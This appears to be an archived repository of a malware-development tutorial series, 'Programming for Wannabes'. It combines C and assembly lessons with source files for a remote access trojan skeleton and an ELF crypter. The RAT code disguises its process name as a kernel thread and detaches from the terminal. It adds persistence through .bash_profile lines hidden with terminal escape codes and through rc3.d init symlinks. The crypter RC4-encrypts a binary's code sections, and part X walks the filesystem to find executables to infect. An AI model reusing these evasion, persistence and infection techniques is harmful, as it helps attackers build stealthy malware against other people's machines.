├── code
    ├── 11
    │   └── rat0x0-04.c
    ├── 12
    │   └── rat0x0-05.c
    └── 13
    │   └── crypter-1.0.c
├── README.md
├── part-02.5.md
├── part-10.md
├── part-11.md
├── part-02.md
├── part-01.md
├── part-08.md
├── part-03.md
└── part-07.md


/code/11/rat0x0-04.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <unistd.h>
 3 | #include <string.h>
 4 | 
 5 | int main (int argc, char *argv[]) {
 6 |   pid_t pid;
 7 |   printf ("This is RAT0X0 version 0.1\n");
 8 | 
 9 |   strcpy (argv[0],"[Jbd2/sda0-8]");
10 |   if ((pid = fork()) != 0) return 0;
11 |   setsid(); // Remove TTY
12 |   if ((pid = fork()) != 0) return 0;
13 | 
14 |   while (1) usleep (1000);
15 | }
16 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | **Note that this repository has been archived. Thanks for your interest**
 2 | # Programming course for Wannabes
 3 | This repo contains the _Programming for Wannabes_ series originally published in 0x00sec.org. I'm just putting this all together to be able to see everything at once.
 4 | 
 5 | 
 6 | 
 7 | 
 8 | * [Programming for Wannabes. Part I. Your first Program](part-01.md)
 9 | 
10 |   Computer architecture introduction. Machine Code introduction. How C relates to asm.
11 | 
12 | * [Programming for Wannabes. Part II. Systemcalls](part-02.md)
13 | 
14 |   Syscall introduction. Using syscalls from C and asm. Stripping down binaries (removing standard libs)
15 | 
16 | * [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md)
17 | 
18 |   Part II for ARM and MIPS
19 | 
20 | * [Programming for Wannabes. Part III. Your first Shell Code](part-03.md)
21 | 
22 |   Processor Native Word Size. HW Memory Models. Pointers. Convert Hello World into a shellcode
23 | 
24 | * [Programming for Wannabes. Part IV. The Stack](part-04.md)
25 | 
26 |   Stacks. Function parameters, prologue and epilogue. Stack Frame. Local variables. Buffer overflows and Canaries concepts
27 | 
28 | * [Programming for Wannabes. Part V. A Dropper](part-05.md)
29 | 
30 |   Writing a dropper (TCP client). Optimize for size. Dropping the dropper hijacking existing raw shell TCP connection (using `ptrace`)
31 | 
32 | * [ Programming for Wannabes Part VI. Malware Introduction](part-06.md)
33 | 
34 |   General introduction to malware. We start writting a generic skeleton to code any kind of malware
35 | 
36 | * [ Programming for Wannabes Part VII. Finding Files I](part-07.md)
37 | 
38 |    How to navigate directories to search for specific files
39 | 
40 | * [ Programming for Wannabes Part VIII. Files Details](part-08.md)
41 | 
42 |   Using stat to get information about files and navigate recursively directories trees
43 | 
44 | * [ Programming for Wannabes Part IX. Files Files in asm](part-09.md)
45 | 
46 |   Recoding part VII but this time in assembler
47 | 
48 | * [ Programming for Wannabes Part X. File Details in asm](part-10.md)
49 | 
50 |   Recoding part VIII but this time in assembler
51 | 
52 | * [ Programming for Wannabes Part XI. Introduction to RATs](part-11.md)
53 | 
54 |   Let's get started coding Remeote Access Trojans. How to disguess RATs on sight
55 | 
56 | 
57 | * [ Programming for Wannabes Part XII. Persistence](part-12.md)
58 | 
59 |   Adding persistence to our RAT
60 | 
61 | * [ Programming for Wannabes Part XIII. Crypters Part I](part-13.md)
62 | 
63 |  Everything about crypters. Part I, RC4 algorithm and introduction to ELF format
64 | 


--------------------------------------------------------------------------------
/code/13/crypter-1.0.c:
--------------------------------------------------------------------------------
 1 | #include <stdio.h>
 2 | #include <stdlib.h>
 3 | #include <string.h>
 4 | 
 5 | #include <unistd.h>
 6 | #include <fcntl.h>
 7 | #include <sys/stat.h>
 8 | #include <sys/mman.h>
 9 | 
10 | #include <elf.h>
11 | 
12 | #define DIE(s) {perror(s);exit(1);}
13 | #define SWAP(a,b) a += b; b= a -b; a-=b;
14 | 
15 | int rc4 (unsigned char *msg, int mlen, unsigned char *key, int klen) {
16 |   int           i,j;
17 |   unsigned char S[256]; // Permutation matrix
18 |   
19 |   // KSA: Key-Schedulling Algorithm
20 |   for (i = 0; i < 255; S[i] = i,i++);   
21 |   for (j = 0, i = 0; i < 256; i++) {
22 |     j = (j + S[i] + key[i % klen] ) % 256;
23 |     SWAP(S[i],S[j]);
24 |   }
25 |   // Encoding
26 |   i = j = 0;
27 |   int cnt = 0;
28 |   while (cnt < mlen) {
29 |     i = (i + 1) % 256;
30 |     j = (j + S[i]) % 256;
31 |     
32 |     SWAP(S[i],S[j]);
33 |     
34 |     msg[cnt] = msg[cnt] ^ S[(S[i] + S[j]) % 256];
35 |     cnt++;
36 |   }
37 |   printf (" [%d bytes encoded]", cnt);
38 |   return 0;
39 | }
40 | 
41 | int main (int argc, char *argv[]) {
42 |   
43 |   if (argc != 2) {
44 |     fprintf (stderr, "Invalid number of parameters\n");
45 |     fprintf (stderr, "Usage: crypter binary\n");
46 |     exit (-1);
47 |   }
48 |   // Open file
49 |   int fd;
50 |   if ((fd = open (argv[1], O_RDWR, 0)) < 0) DIE ("open");
51 |   // get size
52 |   struct stat _st;
53 |   if (fstat (fd, &_st) < 0) DIE ("fstat");
54 |   // Map file
55 |   unsigned char *p;
56 |   if ((p = mmap (0, _st.st_size, PROT_READ | PROT_WRITE,
57 | 		 MAP_SHARED, fd, 0)) == MAP_FAILED) DIE ("mmap");
58 |   // Find code segment
59 |   Elf64_Ehdr *elf_hdr = (Elf64_Ehdr*) p;
60 |   // Sanity checks oimitted
61 |   printf ("Section Table located at : %ld\n", elf_hdr->e_shoff);
62 |   printf ("Section Table entry size : %d\n",  elf_hdr->e_shentsize);
63 |   printf ("Section Table entries    : %d\n",  elf_hdr->e_shnum);  
64 | 
65 |   int           i;
66 |   Elf64_Shdr    *sh = (Elf64_Shdr*)(p + elf_hdr->e_shoff) ;
67 |   //Elf64_Shdr    *sh_strtab = sh + elf_hdr->e_shstrndx;
68 |   //char *s_name = p + sh_strtab->sh_offset;
69 |   char *s_name = p + sh[elf_hdr->e_shstrndx].sh_offset;
70 |   
71 |   char *key ="0x00Sec!\0";  // Use 8 characters to make asm simpler.
72 |   char *name = NULL;
73 | 
74 |   for (i = 0; i < elf_hdr->e_shnum; i++) {
75 |     name = s_name + sh[i].sh_name;
76 |     printf ("Section %02d [%20s]: Type: %d Flags: %lx | Off: %lx Size: %lx => ",
77 | 	    i, name,
78 | 	    sh[i].sh_type, sh[i].sh_flags,
79 | 	    sh[i].sh_offset, sh[i].sh_size);
80 |     //Find `.text` and `.rodata`
81 |     if (!strcmp (name, ".text") || !strcmp (name, ".rodata")) {
82 |       // encrypt section
83 |       rc4 (p + sh[i].sh_offset, sh[i].sh_size, (unsigned char*)key, strlen (key));
84 |       printf (" - Crypter!\n");
85 |     }     else printf ("\n");
86 |     
87 |     
88 |   }
89 | 
90 |   // Inject stub here
91 |   munmap (p, _st.st_size); 
92 |   close (fd);
93 |   return 0;
94 | }
95 | 


--------------------------------------------------------------------------------
/code/12/rat0x0-05.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <unistd.h>
  3 | #include <string.h>
  4 | 
  5 | #include <sys/types.h>
  6 | #include <sys/stat.h>
  7 | #include <fcntl.h>
  8 | 
  9 | 
 10 | int go_to_hell () {
 11 |   pid_t pid;
 12 |   
 13 |   if ((pid = fork()) != 0) return 0;
 14 |   setsid(); // Remove TTY
 15 |   if ((pid = fork()) != 0) return 0;
 16 |   
 17 |   return 0;
 18 | }
 19 | 
 20 | #define USER_PERSISTENCE 0
 21 | #define SYS_PERSISTENCE 1
 22 | 
 23 | 
 24 | int escalate () {
 25 |   if (getuid () == 0) return SYS_PERSISTENCE;
 26 | #if 0
 27 |   extract_info ();
 28 |   if (find_exploit ()) {
 29 |     apply_exploit (); // This will actually run the RAT
 30 | 	exit (1);         // so we are done
 31 |   }
 32 | #endif
 33 |   return USER_PERSISTENCE;
 34 | }
 35 | 
 36 | int append_str (char *fname, char *str) {
 37 |   int fd = open (fname, O_APPEND | O_WRONLY);
 38 |   if (fd < 0) perror ("open:");
 39 |   if (write (fd, str, strlen (str)) < 0) perror ("write:");
 40 |   close (fd);
 41 | }
 42 | int check_update1 (char *fname) {
 43 |   unsigned char buffer [1024];
 44 |   int i, fd = open (fname, O_RDONLY);
 45 |   do {
 46 |     int len = read (fd, buffer, 1024);
 47 |     for (i = 0; i < len; i++)
 48 |       if (buffer[i] == '\010') {
 49 | 	printf ("File %s already infected\n", fname);
 50 | 	return 0;
 51 |       }
 52 | 	
 53 |     if (len == 0) break;
 54 |   } while (1);
 55 |   close (fd);
 56 |   return 1;
 57 | }
 58 | unsigned char is_updated (char *fname) {
 59 |   unsigned char buffer, res = 1;
 60 |   int fd = open (fname, O_RDONLY);
 61 |   do {
 62 |        int len = read (fd, &buffer, 1);
 63 |        if (len <= 0) break;
 64 |        if (buffer == '\010') {
 65 | 	     printf ("- File %s already infected\n", fname);
 66 | 		 res = 0;
 67 | 	     break;
 68 |        }
 69 |      } while (1);
 70 |   close (fd);
 71 |   return res;
 72 | }
 73 | 
 74 | 
 75 | int persistence_user () {
 76 |   printf ("Applying User Persistence\n");
 77 |   // apply user persistence
 78 |   if (is_updated ("./.bash_profile"))
 79 |     {
 80 |       append_str ("./.bash_profile", "echo \"I am some harmless malware\"\n");
 81 |       append_str ("./.bash_profile", "#\033[1A\033[2K\033[1A\n");
 82 |       append_str ("./.bash_profile", "PATH=$HOME/bin:$PATH\n");
 83 |       append_str ("./.bash_profile", "#\033[2K\033[1A\033[2K\010");
 84 |     }
 85 |   return 0;
 86 | }
 87 | 
 88 | int create_from_str (char *fname, int runlevel, char *str) {
 89 |   char target[1024] = "./rcX.d/S99malware";
 90 |   int fd = open (fname, O_CREAT | O_WRONLY, 0777);
 91 |   if (fd < 0) perror ("open:");
 92 |   if (write (fd, str, strlen (str)) < 0) perror ("write:");
 93 |   close (fd);
 94 |   target[4] = '0' + runlevel;
 95 |   symlink (fname, target);
 96 | }
 97 | 
 98 | char script[] =
 99 |   "#!/bin/bash\n"
100 |   "echo \"I'm malware\"\n"
101 |   "# Doing bad things here";
102 | 
103 | int persistence_root () {
104 |   printf ("Applying System Persistence\n");
105 |   create_from_str ("./init.d/malware", 3, script);
106 |   // apply root persistence
107 |   return 0;
108 | }
109 | 
110 | int persistence_root1 () {
111 |   printf ("Applying System Persistence\n");
112 |   unsigned char buffer[1024];
113 |   getcwd (buffer, 1024);
114 |   strcat (buffer, "/rat0x0-05\0");
115 |   symlink (buffer, "./rc3.d/S99rat0x0");
116 |   printf ("%s\n", buffer);
117 |   return 0;
118 | }
119 | 
120 | int payload () {
121 |   while (1) {
122 |     // C2C communication loop
123 |     usleep (1000);
124 |   }
125 | }
126 | 
127 | int main (int argc, char *argv[]) {
128 |   int (*persistence[2])() = {persistence_user, persistence_root1};
129 | 
130 |   printf ("This is RAT0X0 version 0.2\n");
131 |   // go_to_hell ();
132 |   strcpy (argv[0],"[Jbd2/sda0-8]");
133 |   persistence [escalate ()]();
134 |   payload ();
135 | }
136 | 


--------------------------------------------------------------------------------
/part-02.5.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part II and a Half
  2 | 
  3 | If you had read [Part II](part-02.md) of this series you may have missed a couple of details. Consider this post as a short addendum to Part II including those details. 
  4 | 
  5 | 
  6 | The first you may have noted is that there was no ARM or MIPS code in there. Actually, the paper was already quite long and, to be honest, I thought it should be straightforward to repeat what we did for the x86 with any of those processors. However, I tried myself for the Lulz and I found some glitches that may be useful to mention.
  7 | 
  8 | So let's go with ARM
  9 | 
 10 | # ARM system calls
 11 | Calling a system call from ARM works is, conceptually, done in the same way that in the Intel processors. You have to set a specific register with the number of the system call you want to invoke and then get into kernel mode.
 12 | 
 13 | ARM defines 15 registers, named from `r0` to `r12`. The last 3 have special names and special functions, we will go into the details later in this course. For the time being we will only use the general purpose registers (those `r0` to `r12`).
 14 | 
 15 | So, the system call number goes into `r7`... yes, there is a reason, but it does not really matter now. Then the additional parameters needed by the system call goes into registers `r0` to `r5`.
 16 | 
 17 | With all this information and, taking into consideration that system calls follows the same numbering that the Intel 32bits, we can write our exit function like this:
 18 | 
 19 | ```nasm
 20 | .text
 21 | .globl _exit
 22 | 
 23 | _exit: mov r7, #1
 24 |        swi #0
 25 | 
 26 | ```
 27 | 
 28 | As it happened with the Intel processor, the kernel follows the default processor C ABI. This means that when you call a C function, the first parameter goes int `r0` and when you call a system call the first argument also goes in `r0`. That's why we do not have to do anything to capture the parameter we pass to the `_exit` function from C.
 29 | 
 30 | I will reproduce the C code again, in here for your convenience:
 31 | 
 32 | ```C
 33 | #include <unistd.h>
 34 | 
 35 | int _start (void)
 36 | {
 37 |   int a = 10;
 38 |   int b = 20;
 39 | 
 40 |   a = a + b;
 41 |   _exit (a);
 42 | }
 43 | 
 44 | ```
 45 | 
 46 | Now, we can proceed as we did with Intel, but we have to be aware that... `gcc` generates ARM 32bits opcodes and `as`, the assembler generates Thumb opcodes... at least that was what happen with my `gcc` and `as`. Thumb is 16bits long and... well you cannot just mix 16bits and 32bits opcodes directly. So there are two options to solve this problem.
 47 | 
 48 | * **Option 1**. Force 32bits passing the compiler the `-marm` flag
 49 | * **Option 2**. Mark the assembler code as a Thumb function, using the `.thumb_func` directive before the declaration of your function.
 50 | 
 51 | I tried both, but in this paper, let's use option 1... I haven't checked all the details for option 2 so I may be saying something stupid :P
 52 | 
 53 | ```
 54 | arm-linux-gnueabi-gcc -static -fPIC -nostartfiles -nodefaultlibs -nostdlib -marm -o c2-3-arm c2-2.c exit_func-arm1.s
 55 | ```
 56 | 
 57 | As you can imagine `exit_func-arm1` is the assembly code for option 1. The one we shown above.
 58 | 
 59 | Now you can test your program in your Android Phone or in any other ARM machine (BeagleBone Black, BananaPi, Olinuxino, RaspberryPi,...)... To check it in your phone take a look to this paper ([Improving your Android Shell](https://0x00sec.org/t/improving-your-android-shell/886) ).
 60 | 
 61 | # MIPS system calls
 62 | With MIPS I had a quite tough time. The toolchain for my test router used and old version of binutils and that caused me a lot of problems.
 63 | 
 64 | First one was that I couldn't use the names of the registers but its number. MIPS registers are named in a more complex way:
 65 | 
 66 | 
 67 |     $0	      	$zero	        Hard-wired to 0
 68 |     $1		$at		Reserved for pseudo-instructions
 69 |     $2  - $3	$v0, $v1	Return values from functions
 70 |     $4  - $7	$a0 - $a3	Arguments to functions - not preserved by subprograms
 71 |     $8  - $15	$t0 - $t7	Temporary data, not preserved by subprograms
 72 |     $16 - $23	$s0 - $s7	Saved registers, preserved by subprograms
 73 |     $24 - $25	$t8 - $t9	More temporary registers, not preserved by subprograms
 74 |     $26 - $27	$k0 - $k1	Reserved for kernel. Do not use.
 75 |     $28		$gp		Global Area Pointer (base of global data segment)
 76 |     $29		$sp		Stack Pointer
 77 |     $30		$fp		Frame Pointer
 78 |     $31		$ra		Return Address
 79 | 
 80 | (taken from http://www.cs.uwm.edu/classes/cs315/Bacon/Lecture/HTML/ch05s03.html)
 81 | 
 82 | We can see again how the last registers are used for special purposes. As I said, we will come to this in a future instalment. For now, we will just use `$v` and `$a` registers.
 83 | 
 84 | So, how do we invoke a system call on a MIPS processor?. Again, we have to put the system call in a register and go into kernel mode. The register for the system call is `$v0` or `$2` and the instruction to go into kernel mode is `syscall`.
 85 | 
 86 | In my case I found the syscall number, disassembling one of my test programs. Then I found that, at least for `SYS_exit`, this page seems to have the right numbers ( https://w3challs.com/syscalls/?arch=mips_o32 ).
 87 | 
 88 | If I told you that parameters, as stated in the table above, goes into `$aX`, then you should be able to write your exit function... something like this:
 89 | 
 90 | ```nasm
 91 | .globl _exit
 92 | .text
 93 | 	
 94 | _exit:  li $2, 4001
 95 | 	syscall
 96 | ```
 97 | 
 98 | Let's go with the glitches I mentioned at the beginning. The first one is that... at least for my toolchain, the first function getting executed is `__start` instead of `_start`. It took me a while to realize that (even when the linker was complaining), those two underscores are difficult to see when it is late night. Therefore, we need to change our C code and change the name of our function from `_start` to `__start`.
 99 | 
100 | The second one was really frustrating, and I haven't completely understood what the problem is. Apparently, for some reason that I do not know, my toolchain cannot compile static binaries. Any attempt to do that will produce a binary that crashes on my router. I have to do some experimentation, but for the time being this is a mystery.
101 | 
102 | So, for MIPS, at least for me, I couldn't go that far as I went for Intel and ARM. Even when the `exit` function gets substituted (actually I changed to name to something not in libc and the function got called properly) by our minimal system call. However, I didn't manage to get completely rid of the libc.
103 | 
104 | `$ mips-linux-uclibc-gcc -nostartfiles -o c2-2-mips c2-2-mips.c exit_func_mips.s`
105 | 
106 | Even though doesn't look like there is any libc dependency. `nm` only shows an undefined symbol:
107 | 
108 | ```
109 | $ nm n
110 | 00440414 A __bss_start
111 | 00400120 r _DYNAMIC
112 | 00440414 A _edata
113 | 00440414 A _end
114 | 004003c0 T _exit
115 | 00440414 A _fbss
116 | 004403e0 A _fdata
117 | 00400360 T _ftext
118 | 004403f0 A _GLOBAL_OFFSET_TABLE_
119 | 004483e0 A _gp
120 |          U _gp_disp
121 | 004403e0 D __RLD_MAP
122 | 00400360 T __start
123 | ```
124 | 
125 | Anyway, I have found that this stuff becomes tricky with routers, specially if you do not have a toolchain that actually matches your router and also that, many of them run old and very stripped down version of linux that imposes additional constraints in the code.
126 | 
127 | Let's finish with some numbers as we did with intel:
128 | 
129 |     c2-3-arm  320 bytes  (ARM version)
130 |     c2-2-mips 1.8 Kbytes (MIPS version
131 | 
132 | These values are after `stripping` the binaries. Not bad...
133 | 
134 | Well, this is it for ARM and MIPS... at least for me and for now :slight_smile: 
135 | 
136 | # Conclusions
137 | We have done a short journey from the C realm to the kernel border and we have found quite a lot of stuff in between. It is interesting to understand all this... it changes a bit the way you see the programs running in your computer. We use to think that a C program is pretty low level and it is very fast and optimized. We have seen a bit of what it goes into a C program... now, just think about what is in there when using a scripting language... _So many CPU cycles_....
138 | 
139 | In next part we will come back to general programming... maybe...
140 | 
141 | * PREVIOUS: [Programming for Wannabes. Part II. Systemcalls](part-02.md)
142 | * NEXT: [Programming for Wannabes. Part III. Your first Shell Code](part-03.md)
143 | 


--------------------------------------------------------------------------------
/part-10.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wanabes X. File details in asm
  2 | We have already code to scan a single folder and in this instalment we are going to extend it to scan complete folder trees and also get the details from the files so our malware can decide with file is interesting or not.
  3 | 
  4 | This is going to be pretty short as we already know everything needed to implement this extension.
  5 | 
  6 | # Refresher.... the code so far
  7 | In the previous instalment, towards the end I mentioned that using an ascending loop will have some benefits in this specific case so, I will include this modification in the base code.
  8 | 
  9 | You can check it as an exercise. It does exactly the same than the previous version, but counts from zero to the number of bytes returned by `getdents`, instead of decreasing that value until we get to zero.
 10 | 
 11 | This is the code.
 12 | 
 13 | ```nasm
 14 | 	global mfw_select_target
 15 | 	extern mfw_puts
 16 | 	extern mfw_putln
 17 | 	extern mfw_openat
 18 | 	extern mfw_newfstatat
 19 | 	extern mfw_getdents
 20 | 	extern mfw_close
 21 | 
 22 | 	section .text
 23 | 	
 24 | mfw_select_target:
 25 | 	BUF_SIZE  EQU     0x400
 26 | 	STAT_SIZE EQU     0x144
 27 |   	FD	  EQU     0x08
 28 |  	BUF       EQU     (FD   + BUF_SIZE)
 29 | 	ST        EQU     (BUF + STAT_SIZE)
 30 | 	STE       EQU     BUF
 31 | 	D_NAME    EQU     0x12
 32 | 	D_RECLEN  EQU     0x10
 33 | 	ST_MODE   EQU     0x18
 34 | 	
 35 | 	;; Create Stack Frame
 36 | 	push  rbp
 37 | 	mov   rbp, rsp
 38 | 	sub   rsp, STE
 39 | 	
 40 | 	;; Open Directory
 41 | 	;; RDI and RSI should be all set
 42 | 	mov  rdx, 0q200000 	;O_RDONLY | O_DIRECTORY
 43 | 	call mfw_openat
 44 | 	test al,al
 45 | 	js   done1		; Exit if we cannot open the folder. Likely permission denied error
 46 | 	
 47 | 	mov  QWORD [rbp-FD], rax ;Store fd in local var
 48 | loop0:
 49 | 	mov  rdi, QWORD [rbp-FD]
 50 | 	lea  rsi, [rbp-BUF]
 51 | 	mov  rdx, BUF_SIZE
 52 | 	call mfw_getdents
 53 | 	
 54 | 	test ax,ax
 55 | 	jz   done		    ; 0 means we are done reading the folder
 56 | 	js   loop0 		    ; <0 means error.... we just try again
 57 | 
 58 | 	mov r9, rax		    ; Loop limit
 59 | 	lea r8, [rbp-BUF] 	; Points to struct linux_dirent record
 60 | 	xor r14,r14 		; Loop counter = 0
 61 | 
 62 | loop1:
 63 | 	lea   rdi, [r8 + r14  + D_NAME] ; Offset to current dirent name
 64 | 
 65 | ;; ***********************************************
 66 | ;; All new code goes here
 67 | ;; *****************************************************
 68 | 	;;  For the time being just print file name
 69 | 	mov  rdi, rsi
 70 | 	call mfw_putln
 71 | 
 72 | next:
 73 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov
 74 | 	add r14,rdx
 75 | 	cmp r14, r9
 76 | 	jge loop0                ; If it is zero, get more data
 77 | 	jmp loop1
 78 | 	
 79 | done:	
 80 | 	;; Close directory
 81 | 	mov rdi, QWORD [rbp-FD]
 82 | 	call mfw_close
 83 | done1:	
 84 | 	leave     		; Set RSP=RBP and pops RBP
 85 | 	ret
 86 | 
 87 | ```
 88 | 
 89 | Before continuing, you may have noticed the use of `movzx` instruction. This is new and we haven't talked about it before. This instruction and also it counterpart `movsx` allows us to read a value into a register that is smaller than the target register. Let's check the instruction
 90 | 
 91 | ```nasm
 92 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN]
 93 | ```
 94 | 
 95 | In this case we are moving a memory word (16 bits) into a 64 bits register. The `movZx` instruction will complete the target with zeros while the `movSx` will extend the sign. In this example, the value we want is 2 bytes, but we want to use it on the 64bits register for the arithmetic operations (actually the `edx` will likely be enough, but we would have to use the instruction in any case).
 96 | 
 97 | The difference between this instruction and a single move is that the last will not update the higher word on the register, and we should set the register to zero before copying only the lower 16bits. 
 98 | 
 99 | In the same way, if we are dealing with negative numbers...
100 | 
101 | # Negative numbers
102 | So far we haven't care much about negative numbers... in a sense, we kind of magically assumed that they just work as it happens on C or any other high level language, however, there is a few things we need to know about number representation and its associated arithmetic.
103 | 
104 | Let's start thinking on a single byte (8 bits or 8 ones or zeros). As we know with 8 bits we can represent 256 values (from 0 to 255). That's perfect for natural numbers, but what happens if we need negative numbers?... And we need then, I can already told you that.
105 | 
106 | Well, in that case we need to encode the number differently. First thing is to store the sign of the number, and, that will take a bit.... I mean, it cannot take less... at least not without over-complicating the solution. Then if 1 bit is reserved for the sign, we have 7 bits to represent the actual number and that is 128 values. let's print a few of those numbers
107 | 
108 |     8 => 0 000 1000        -8 => 1 000 1000
109 | 	7 => 0 000 0111        -7 => 1 000 0111
110 | 	....
111 | 	1 => 0 000 0001        -1 => 1 000 0001
112 | 	0 => 0 000 0000         0 => 1 000 0000
113 | 	
114 | So, we see a few problems with this representation. The first one is that we have two representations for the number zero. That is not convenient as can make computations ambiguous and we are also loosing the opportunity to represent one extra number.
115 | 
116 | The second problem of this representation is that multiplication is kind of easy, but addition is kind of a hell. 
117 | 
118 | Fortunately for us, some smart people long ago come up with a better representation for the negative numbers....
119 | 
120 | # 2-complements
121 | This representation of the numbers also uses the most significant bit to indicate the sign, but the value of the number is encoded in a smarter way. Let's see our table of numbers again and then let's explore the benefits of this representation:
122 | 
123 |     8 => 0 000 1000        -8 => 1 110 1000
124 | 	7 => 0 000 0111        -7 => 1 111 1001
125 | 	....
126 | 	2 => 0 000 0010        -2 => 1 111 1110
127 | 	1 => 0 000 0001        -1 => 1 111 1111
128 | 	0 => 0 000 0000         
129 | 
130 | As we can see now there is one single representation for zero, that is actually zero (all bits zero). This has a consecuence... zero is somehow a positive number, because the most significant bit is 0 (that is our sign bit). This is why a signed char can take values from -128 to 127 (because the zero is part of the positives)
131 | 
132 | In addition to the sign, the rest of the number is constructed counting upward as usual for the positive numbers, and backwards for the negative ones... 
133 | 
134 | Actually the way to change the sign of a number, or if you prefer, calculate  the two's complement is as follows:
135 | 
136 | * Invert all bits in the number (this is the so called one's complement)
137 | * Add 1
138 | 
139 | Let's use as example the number 5 and let's calculate the two's complement of it, or in other words, let's determine the bit representation of -5. 
140 | 
141 |     Number 5   ->  00000101
142 |     NOT(5)     ->  11111010
143 | 	NOT(5) + 1 ->  11111011
144 | 	
145 | The other big advantage of this representation is that basic arithmetic operation will just work. Just add the 5 and -5 above and it will result in zero. Substraction and multiplication also works out of the box. I won't go further into this topic. The interested reader shall read the [Wikipedia page](https://en.wikipedia.org/wiki/Two%27s_complement#Converting_to_two's_complement_representation), and if you are really into maths and scientific SW you also need to read [this](https://www.itu.dk/~sestoft/bachelor/IEEE754_article.pdf).
146 | 
147 | # Back to `movsx`
148 | So, now that we know how a negative number is represented we can come back to the `movSx` where `S` stands for _sign_. This instruction works the same than `movzx` but performing what is know as sign extension.
149 | 
150 | Sign extension happens when copying some value of a specific datatype into another value but of a bigger datatype. Imagine you want to copy the value 7 in a byte in memory, into the 32 bits register `EDX`.
151 | 
152 |     EDX                                     Memory Byte
153 | 	XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX     00000111
154 | 	                                           |  (mov edx, BYTE [mem]
155 |     XXXXXXXX XXXXXXXX XXXXXXXX 00000111 <------+
156 | 	
157 | In the diagram above `X` means any value. It may be zero or one. When we move the byte into `EDX` we will just update the less significant byte... Anything else in the register will remind. However, when we use `movzx` we are forcing zeros in all the other bits in the register.... and when using `movsz` we are forcing the sign bit. Let's change the byte memory to some negative value
158 | 
159 |     EDX                                     Memory Byte
160 | 	XXXXXXXX XXXXXXXX XXXXXXXX XXXXXXXX     11111110  (-2)
161 | 	                                           |  (movzx edx, BYTE [mem]
162 |     00000000 00000000 00000000 11111110 <------+
163 | 	                                           |  (movsx edx, BYTE [mem]
164 |     11111111 11111111 11111111 11111110 <------+
165 | 
166 | In the first case we copy the byte in the lower part of the register (actually `dl`) and then we set everything else to 0. En the second case we set everything else to the sign bit. This way, the result of the first case is 254 while in the second case it is still -2.
167 | 
168 | # Calling `statat`
169 | Now we can just write the loop to call `statat` and check the file type. Let's split this in two parts. First the call to `statat` and then the check of the file.
170 | 
171 | The first part is pretty straight forward:
172 | 
173 | ```nasm
174 | 
175 | loop1:
176 | 	lea   rdi, [r8 + r14  + D_NAME] ; Offset to current dirent name
177 | 	
178 | 	;; Skip . and .. names
179 | 	;; ---------------------------
180 | 	cmp WORD [rdi], 0x002e
181 | 	je next
182 | 	cmp WORD [rdi], 0x2e2e
183 | 	jne check_file
184 | 	cmp BYTE [rdi+2], 0
185 | 	je next
186 | 	
187 | 	;; Check file type and permissions
188 | check_file:	
189 | 	lea    rsi, [rdi]	; Par2 : name
190 | 	mov    rdi, [RBP - FD]  ; Par1 : fd
191 | 	lea    rdx, [RBP - ST]  ; Par3 : struct stat
192 | 	xor    rcx, rcx		; Par4 : flags
193 | 	call   mfw_newfstatat
194 | 	
195 | 	test   al,al
196 | 	js     next		; Silently skip this file on error. Likely Permission denied
197 | 	
198 | 	;; ********************************
199 | 	;; Here the code to check the file
200 | 	;; *********************************
201 | run_payload:
202 | 	;;  For the time being just print file name
203 | 	mov  rdi, rsi
204 | 	call mfw_putln
205 | 
206 | next:
207 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov
208 | 	(...)
209 | ```
210 | 
211 | 
212 | The first part of the code just checks the file name and skips it in case it is `.` or '..' in order to avoid infinite loops. The check is done comparing against the ascii values (`0x0023` and `0x002323`) of both strings. For the second case, I first tried to read a `DWORD` to just do a comparison, but it looks like the size of `..` is exactly three and I was getting some randon stuff in the most significant byte... any other way to do the check I thought about just ended in longer code... but let me know in the comments if you found a better way.
213 | 
214 | Then we just found the call to `newfstatat`. Nothing special here, we have already used this from C, we just set the second parameter first, because we already have that value in `rdi`, so we just do that assignment fist before overwriting `rdi` and we take advantage of _moving_ data between registers.
215 | 
216 | Finally we check if the syscall failed and silently continue in that case.
217 | 
218 | # Checking file type
219 | Now we need to check the file type. As we did in C, we are going to look for executable files. Note that this is a basic check and in the real world you may need to do further checks. For instance, a virus will need to check that the file is also an `ELF` binary and not just a bash script... both are executable files but their structures are pretty different. Even when it is possible to infect a `bash` file that is something you do not really need special skills to do.
220 | 
221 | This part of the code also performs the recursive call that allows us to scan the whole filesystem tree.
222 | 
223 | ```nasm
224 | 	;; Check if it is a directory
225 | 	mov  eax, DWORD [rdx + ST_MODE]
226 | 	and  eax, 0q0170000
227 | 	cmp  eax, 0q0040000
228 | 	jz   scan_folder	; If it is a directory... scan recursively
229 | 	cmp  eax, 0q0100000 
230 | 	jnz  next               ; If it is not a regular file.... skip it
231 | 	
232 | 	;; If we got a regular file then let's check permissions
233 | 	mov  eax, DWORD [rdx + ST_MODE]
234 | 	and  eax, 0q00111	; Execution permisions
235 | 	jz   next		; If no execution permision set... skip the file
236 | 	jmp  run_payload	; Otherwise run the payload on it
237 | 	
238 | scan_folder:
239 | 	;; Before the recursive call we need to store current state in the stack
240 | 	;; File descruptor and getents are already there. We just store the registers
241 | 	;; This way, we only use the memory when scanning a subfolder
242 | 	push  r8 		; Current getdents buffer
243 | 	push  r9		; Number of bytes in getents buffer
244 | 	push  r14               ; Current getendts buffer ofsset 
245 | 
246 | 	call  mfw_select_target ; RDI and RSI already set to the right parameters
247 | 	;; Restore evertything and keep going
248 | 	pop   r14		; PUSH/POP are 2 bytes long... mov reg, [bp-XX] is 4
249 | 	pop   r9
250 | 	pop   r8
251 | 	jmp   next		; Continue
252 | ```
253 | 
254 | The first thing we do us to get the `st_mode` field from the `struct stat` returned by `newfstatat`. Then we mask the `__S_IFM` value that we have found when developing our C version and then we check if we are looking to a directory or a regular file. If the entry is a directory we jump to `scan_folder` to perform the recursive traversal of the just found subfolder, otherwise we check the permissions and if they don't match we just discard this entry and do on to process the next one.
255 | 
